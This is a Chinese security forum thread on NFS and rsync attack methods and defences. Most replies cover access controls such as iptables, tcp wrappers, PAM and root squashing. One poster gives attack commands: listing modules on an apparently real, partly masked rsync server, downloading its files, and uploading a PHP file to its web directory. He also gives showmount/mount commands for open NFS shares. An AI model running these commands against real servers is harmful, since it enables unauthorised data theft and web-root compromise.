专家座谈——NFS,RSYNC攻击方式揭秘以及防御手段

king_819

我发的帖子被删除了？

scutdk

安全防护是一个整体吧，只谈IP限制，那安全意义就不大了
king_819 发表于 2011-11-03 10:21

整体的话应该从哪些方面入手呢？当然了，服务器上面做访问限制（IP，帐号等），然后是管理员自身的安全意识，物理机器的安全防护，还有呢？

我属于纸上谈兵类型的，对于NFS没有实际运用过，rsync虽然用的比较多，但是研究也不是非常深。就从服务器上面做访问限制来说吧。
网络层用iptables 限制只有特定的客户端才可以访问，以及可以访问的端口
传输层再用tcp wrappers给限制一下
最后还可以再用pam在应用层再限制一次。。。
还有就是NFS和rsync本身来做访问控制


NFS涉及到用户权限的问题，一般应该要压制root，不然太危险了。

黑客即便进了获得了内网主机的访问权限，如果还有密码来限制的话，他还是访问不了NFS或者rsync服务器。

snow888

这个好，支持。

xindi10631

说的这些好像都是很基础似的，怎么专家都不出来发言一下啊！

defcon

学习来了

piaohua2005

安全，看似光鲜，如果技术不牛工作不好找啊

tomac_cu

对外网还是BASE HTTP相对安全一些。

现在对内的共享，我也只用cifs，普通用户和root使用选择多多

zhaoke0128

支持，可惜来晚了
rsync一直用ssh密钥认证，iptables做ip限制

cnbird

1.查看rsync服务器上的列表
rsync 210.51.X.X::
finance
img_finance
auto
img_auto
html_cms
img_cms
ent_cms
ent_img
ceshi
res_img
res_img_c2
chip
chip_c2
ent_icms
games
gamesimg
media
mediaimg
fashion
res-fashion
res-fo
taobao-home
res-taobao-home
house
res-house
res-home
res-edu
res-ent
res-labs
res-news
res-phtv
res-media
home
edu
news
res-book

看相应的下级目录(注意一定要在目录后面添加上/)


rsync 210.51.X.X::htdocs_app/
rsync 210.51.X.X::auto/
rsync 210.51.X.X::edu/

2.下载rsync服务器上的配置文件
rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/

3.向上更新rsync文件(成功上传,不会覆盖)
rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/
http://app.finance.xxx.com/warn/nothack.txt
成功上传
楼上就是实战的技巧

cnbird

nfs攻击方式:
showmount -e ip
mount ip:/共享目录 /mnt
就可以利用这样的漏洞了